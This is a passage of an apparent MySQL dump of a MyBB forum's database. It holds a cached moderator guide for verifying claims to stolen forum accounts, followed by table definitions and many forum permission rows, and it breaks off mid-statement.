(http://l33thacking.com/modcp.php?action=ipsearch) if a lot of posts come in the results. If a lot of results show up then it means that that IP has been used a lot also search users to see if it belongs to the stolen/hacked account. 2. Ask what latest PM they remember they replied to. Go to the hacked/stolen account and use the login to the account and browse their inbox to check if they are legit or not because anyone can get the IP. ***Normal Members but with donation award(s)*** 1. Ask for IP or IP and PM. 2. Ask them to give a screenshot of the donation transaction they made to LH then match date with award. ***Upgraded*** 1. Ask for IP 2. Proof of Purchase of upgrade. Picture or video, match date with the award given data. 3. Tell them to list any forum that can be viewed after upgrading under the VIP members tab. *#$*#$*#$*NOTE*#$*#$*#$* If you believe that the account really belongs to them then change their email to the new email they provide you. Then after they change the password, merge the account.\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('extensions', 'a:1:{s:6:\"active\";s:0:\"\";}'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_delayedmoderation`; CREATE TABLE `mybb_delayedmoderation` ( `did` int(10) unsigned NOT NULL AUTO_INCREMENT, `type` varchar(30) NOT NULL DEFAULT '', `delaydateline` bigint(30) NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `fid` smallint(5) unsigned NOT NULL DEFAULT '0', `tids` text NOT NULL, `dateline` bigint(30) NOT NULL DEFAULT '0', `inputs` text NOT NULL, PRIMARY KEY (`did`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_delayedmoderation` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_events`; CREATE TABLE `mybb_events` ( `eid` int(10) unsigned NOT NULL AUTO_INCREMENT, `cid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `name` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `visible` int(1) NOT NULL DEFAULT '0', `private` int(1) NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `starttime` int(10) unsigned NOT NULL DEFAULT '0', `endtime` int(10) unsigned NOT NULL DEFAULT '0', `timezone` varchar(4) NOT NULL DEFAULT '0', `ignoretimezone` int(1) NOT NULL DEFAULT '0', `usingtime` int(1) NOT NULL DEFAULT '0', `repeats` text NOT NULL, PRIMARY KEY (`eid`), KEY `daterange` (`starttime`,`endtime`), KEY `private` (`private`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_events` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_forumpermissions`; CREATE TABLE `mybb_forumpermissions` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT, `fid` int(10) unsigned NOT NULL DEFAULT '0', `gid` int(10) unsigned NOT NULL DEFAULT '0', `canview` int(1) NOT NULL DEFAULT '0', `canviewthreads` int(1) NOT NULL DEFAULT '0', `canonlyviewownthreads` int(1) NOT NULL DEFAULT '0', `candlattachments` int(1) NOT NULL DEFAULT '0', `canpostthreads` int(1) NOT NULL DEFAULT '0', `canpostreplys` int(1) NOT NULL DEFAULT '0', `canpostattachments` int(1) NOT NULL DEFAULT '0', `canratethreads` int(1) NOT NULL DEFAULT '0', `caneditposts` int(1) NOT NULL DEFAULT '0', `candeleteposts` int(1) NOT NULL DEFAULT '0', `candeletethreads` int(1) NOT NULL DEFAULT '0', `caneditattachments` int(1) NOT NULL DEFAULT '0', `canpostpolls` int(1) NOT NULL DEFAULT '0', `canvotepolls` int(1) NOT NULL DEFAULT '0', `cansearch` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`pid`) ) ENGINE=MyISAM AUTO_INCREMENT=995 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_forumpermissions` WRITE; INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('596', '5', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('61', '2', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('597', '5', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('62', '2', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('601', '5', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('598', '5', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('65', '2', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('63', '2', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('602', '5', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('600', '5', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('599', '5', '6', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('64', '2', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('66', '2', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('133', '12', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('135', '15', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('754', '17', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('753', '17', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('537', '28', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('829', '16', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('630', '19', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('628', '19', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('627', '19', '6', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('626', '19', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('625', '19', '4', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('624', '19', '3', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('629', '19', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('623', '19', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('622', '19', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('69', '9', '5', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('132', '12', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('134', '15', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('828', '16', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('101', '28', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('106', '29', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('102', '28', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('107', '29', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('108', '29', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('103', '28', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('109', '29', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('104', '28', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('110', '29', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('105', '28', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('122', '40', '9', '1', '1', '0', '1', '0', '1', '1', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('124', '39', '2', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('125', '39', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('126', '39', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('121', '40', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('123', '40', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('842', '30', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('843', '30', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('844', '30', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('845', '30', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('846', '30', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('436', '31', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('437', '31', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('438', '31', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('439', '31', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('440', '31', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, 